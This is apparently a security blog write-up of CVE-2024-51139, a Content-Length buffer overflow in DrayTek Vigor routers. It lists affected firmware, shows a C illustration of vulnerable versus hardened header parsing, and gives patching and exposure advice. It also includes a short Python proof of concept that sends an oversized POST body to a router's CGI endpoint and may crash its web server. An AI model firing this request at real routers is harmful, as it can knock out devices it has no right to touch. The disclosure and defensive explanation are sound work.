A serious security vulnerability has been publicly disclosed as CVE-2024-51139 affecting a wide range of DrayTek Vigor routers. This flaw is a buffer overflow found in the routers’ HTTP server CGI parser, specifically when handling the Content-Length header of HTTP POST requests. In simple terms, an attacker can use a carefully crafted web request to overwrite memory, which could let them run their own code on the device—remotely and without authentication.

Below is a breakdown of the vulnerability, its impact, the technical details, and how it can be exploited.

Affected Devices and Firmware Versions

Many popular DrayTek routers are vulnerable. The confirmed affected models and firmware versions are:

- Vigor262/LTE200: 3.9.8.9 and earlier
- Vigor286/2925: 3.9.8 and earlier
- Vigor2862/2926: 3.9.9.5 and earlier
- Vigor2133/2762/2832: 3.9.9 and earlier
- Vigor165/166: 4.2.7 and earlier
- Vigor2135/2765/2766: 4.4.5.1 and earlier
- Vigor2865/2866/2927: 4.4.5.3 and earlier
- Vigor2962/391: 4.3.2.8/4.4.3.1 and earlier
- Vigor3912: 4.3.6.1 and earlier

If your router is running one of the listed versions or anything older, it is at risk. Upgrading to the fixed firmware is strongly advised.

About the Vulnerability

The core of the issue is how the router’s web server parses POST requests sent to its CGI scripts. The server trusts the Content-Length header value and uses it unchecked when sizing the buffer for the request body. An overly large Content-Length, or a negative one (which becomes an enormous unsigned value once it is used as a size), makes the body copy overrun the buffer, and a crafted body can then lead to arbitrary code execution.
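To make the bug class concrete, here is an added example in C that is not DrayTek’s code and not taken from the advisory: an illustrative careless Content-Length handler of the kind described above, beside a hardened parser. The buffer size (BODY_BUF_SIZE), the function names and the sample header values are all assumptions for the demonstration. The vulnerable functions only compute the sizes a careless parser would hand to memcpy() and malloc(), so the program runs without actually corrupting memory.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Size of the fixed buffer the illustrative CGI parser copies the POST
 * body into. Assumed for this example, not taken from the firmware. */
#define BODY_BUF_SIZE 1024

/* --- Vulnerable pattern (illustrative, not DrayTek's code) ------------ */

/* Converts the raw Content-Length header the way a careless parser would:
 * atoi() into a signed int, then an implicit cast to size_t when the value
 * reaches memcpy()/read(). "-1" becomes SIZE_MAX, and "4096" is accepted
 * even though the destination holds only BODY_BUF_SIZE bytes.
 * Returns the byte count that would be passed to memcpy(). */
size_t vuln_copy_len(const char *content_length)
{
    int len = atoi(content_length);      /* no error or range check */
    return (size_t)len;                  /* negative -> enormous */
}

/* Would the unchecked copy run past the fixed body buffer? */
int vuln_overflows(const char *content_length)
{
    return vuln_copy_len(content_length) > BODY_BUF_SIZE;
}

/* Second variant of the same bug: the parser sizes a heap buffer as
 * len + 1 in 32-bit arithmetic. A Content-Length of 4294967295 wraps the
 * allocation to 0 bytes while the later copy still uses the full length.
 * Returns the size that would be passed to malloc(). */
uint32_t vuln_alloc_size(const char *content_length)
{
    uint32_t len = (uint32_t)strtoul(content_length, NULL, 10);
    return len + 1;                      /* wraps to 0 when len == UINT32_MAX */
}

/* --- Hardened parser ------------------------------------------------- */

/* Strictly parses Content-Length as 1*DIGIT: rejects empty values, signs,
 * whitespace, trailing garbage, values that overflow the integer type and
 * values larger than the buffer the caller owns.
 * Returns 0 and writes *out on success, -1 on any violation. */
int safe_content_length(const char *value, size_t max_body, size_t *out)
{
    if (value == NULL || *value == '\0')
        return -1;
    for (const char *p = value; *p; p++)
        if (*p < '0' || *p > '9')
            return -1;                   /* no '-', '+', spaces, letters */
    errno = 0;
    char *end;
    unsigned long long n = strtoull(value, &end, 10);
    if (errno == ERANGE || *end != '\0')
        return -1;                       /* overflow of the integer type */
    if (n > max_body)
        return -1;                       /* larger than our buffer */
    *out = (size_t)n;
    return 0;
}

/* Convenience wrapper: parsed length for the fixed body buffer, or -1. */
long checked_content_length(const char *value)
{
    size_t n;
    return safe_content_length(value, BODY_BUF_SIZE, &n) == 0 ? (long)n : -1;
}

int main(void)
{
    /* Constructed header values for the demonstration. */
    const char *samples[] = { "512", "4096", "-1", "4294967295", "12abc", "" };

    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        const char *cl = samples[i];
        printf("Content-Length: %-12s copy=%zu (%s) alloc=%u safe=%ld\n",
               cl, vuln_copy_len(cl),
               vuln_overflows(cl) ? "OVERFLOW" : "ok",
               vuln_alloc_size(cl), checked_content_length(cl));
    }
    return 0;
}
```

The important design point is that the hardened version validates the header before it is ever used as a size: the value must be pure digits, must fit the integer type (strtoull reports ERANGE rather than silently wrapping), and must not exceed the buffer the server actually owns. Any one of those checks alone would have stopped the "-1" and "4294967295" cases above; the third also stops the plain oversized body.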

Below is a Python proof-of-concept (PoC) showing how an attacker might exploit this:

import requests

# Replace with your target's IP address
target_url = "http://192.168.1.1/cgi-bin/mainfunction.cgi"

# The payload can be custom shellcode in a real attack
# Here we use "A" to show the overflow; real exploit would be specific
payload = "A" * 4096  # Adjust length as needed (real payload would be more complex)

headers = {
    "Content-Type": "application/x-www-form-urlencoded",
    "Content-Length": str(len(payload)),  # Overflows buffer on vulnerable firmware
}

try:
    # A timeout is needed: a crashed HTTP server never answers
    response = requests.post(target_url, headers=headers, data=payload, timeout=10)
    print(f"Status Code: {response.status_code}")
except requests.exceptions.RequestException as exc:
    # A reset connection or timeout here is consistent with the server crashing
    print(f"No valid response ({exc}); the HTTP server may have crashed")

Note: Turning this into code execution requires knowledge of the target’s memory layout and a payload tailored to the specific firmware build; with that, an attacker could run their own commands or drop a remote shell. This basic PoC, on its own, may only crash the HTTP server of a vulnerable router.

Why is This So Bad?

- Remote attack: Anyone on the Internet or the local network can attack, provided the HTTP management interface is reachable from where they are. No authentication is needed.
- Privilege: The router’s web server process often runs as root/admin, so code execution means full control of the device.
- Persistence: A successful attacker can persist on the device, intercept or spy on traffic, and pivot to other hosts on your network.

References & Further Reading

- Official DrayTek Security Advisory
- NVD Entry for CVE-2024-51139
- Firmware Download & Upgrades
- Technical Writeup at SSD Secure Disclosure
- Practical Buffer Overflows (HackTricks Guide)

Conclusion

CVE-2024-51139 is a serious vulnerability impacting many popular DrayTek router models. Given how easy it is to trigger (and the total control it gives), updating the firmware is essential.

If you’re a network admin or responsible for an affected DrayTek device, patch now. Disable management interfaces on the Internet-facing (WAN) side, restrict LAN access to the web UI where possible, and review the router’s settings for unnecessary exposure. For more details, consult the references above.

Timeline

Published on: 02/27/2025 21:15:37 UTC
Last modified on: 02/28/2025 18:15:28 UTC